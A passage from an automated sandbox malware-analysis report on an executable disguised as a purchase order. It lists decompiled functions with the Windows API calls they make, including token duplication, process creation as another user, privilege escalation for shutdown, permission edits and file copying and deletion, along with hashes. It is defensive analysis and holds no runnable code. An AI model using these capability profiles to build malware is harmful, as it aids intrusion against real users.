                                                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 2889586943-2988720461
                                                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                            Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                            • CloseHandle.KERNEL32(?), ref: 004463A0
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                            • GetProcessWindowStation.USER32 ref: 004463D1
                                                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                            • _wcslen.LIBCMT ref: 00446498
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _wcsncpy.LIBCMT ref: 004464C0
                                                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                            • CloseDesktop.USER32(?), ref: 0044657A
                                                            • SetProcessWindowStation.USER32(?), ref: 00446588
                                                            • CloseHandle.KERNEL32(?), ref: 00446592
                                                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                            • String ID: $@OH$default$winsta0
                                                            • API String ID: 3324942560-3791954436
                                                            • Opcode ID: 22d32662a92827c1f225a1cc2f84e6774a7bb169a4c9016a1bc6f69518cab1aa
                                                            • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                            • Opcode Fuzzy Hash: 22d32662a92827c1f225a1cc2f84e6774a7bb169a4c9016a1bc6f69518cab1aa
                                                            • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                            Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • _wcscat.LIBCMT ref: 0044BD94
                                                            • _wcscat.LIBCMT ref: 0044BDBD
                                                            • __wsplitpath.LIBCMT ref: 0044BDEA
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                            • _wcscpy.LIBCMT ref: 0044BE71
                                                            • _wcscat.LIBCMT ref: 0044BE83
                                                            • _wcscat.LIBCMT ref: 0044BE95
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2188072990-1173974218
                                                            • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                            • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                            Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                            • FindClose.KERNEL32(00000000), ref: 00478924
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                            • __swprintf.LIBCMT ref: 004789D3
                                                            • __swprintf.LIBCMT ref: 00478A1D
                                                            • __swprintf.LIBCMT ref: 00478A4B
                                                            • __swprintf.LIBCMT ref: 00478A79
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                            • __swprintf.LIBCMT ref: 00478AA7
                                                            • __swprintf.LIBCMT ref: 00478AD5
                                                            • __swprintf.LIBCMT ref: 00478B03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 999945258-2428617273
                                                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                            Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                            • __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscpy.LIBCMT ref: 004034A7
                                                            • _wcscat.LIBCMT ref: 004034BC
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                            • _wcscpy.LIBCMT ref: 004035A0
                                                            • _wcslen.LIBCMT ref: 00403623
                                                            • _wcslen.LIBCMT ref: 0040367D
                                                            Strings
                                                            • _, xrefs: 0040371C
                                                            • Unterminated string, xrefs: 00428348
                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                            • Error opening the file, xrefs: 00428231
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                            • API String ID: 3393021363-188983378
                                                            • Opcode ID: 05175746ade0890ad584a150b56b81d4e08a0757c491d55d86f46e5397480119
                                                            • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                            • Opcode Fuzzy Hash: 05175746ade0890ad584a150b56b81d4e08a0757c491d55d86f46e5397480119
                                                            • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                            Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                            • FindClose.KERNEL32(00000000), ref: 00431B20
                                                            • FindClose.KERNEL32(00000000), ref: 00431B34
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                            Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                            • __swprintf.LIBCMT ref: 00431C2E
                                                            • _wcslen.LIBCMT ref: 00431C3A
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2192556992-3457252023
                                                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                            Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                            • __swprintf.LIBCMT ref: 004722B9
                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FolderPath$LocalTime__swprintf
                                                            • String ID: %.3d
                                                            • API String ID: 3337348382-986655627
                                                            • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                            • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                            Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                            • FindClose.KERNEL32(00000000), ref: 0044291C
                                                            • FindClose.KERNEL32(00000000), ref: 00442930
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                            • FindClose.KERNEL32(00000000), ref: 004429D4
                                                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                            • FindClose.KERNEL32(00000000), ref: 004429E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                            Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                            • GetLastError.KERNEL32 ref: 00433414
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2938487562-3733053543
                                                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                            Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                            • CopySid.ADVAPI32(00000000), ref: 00446271
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
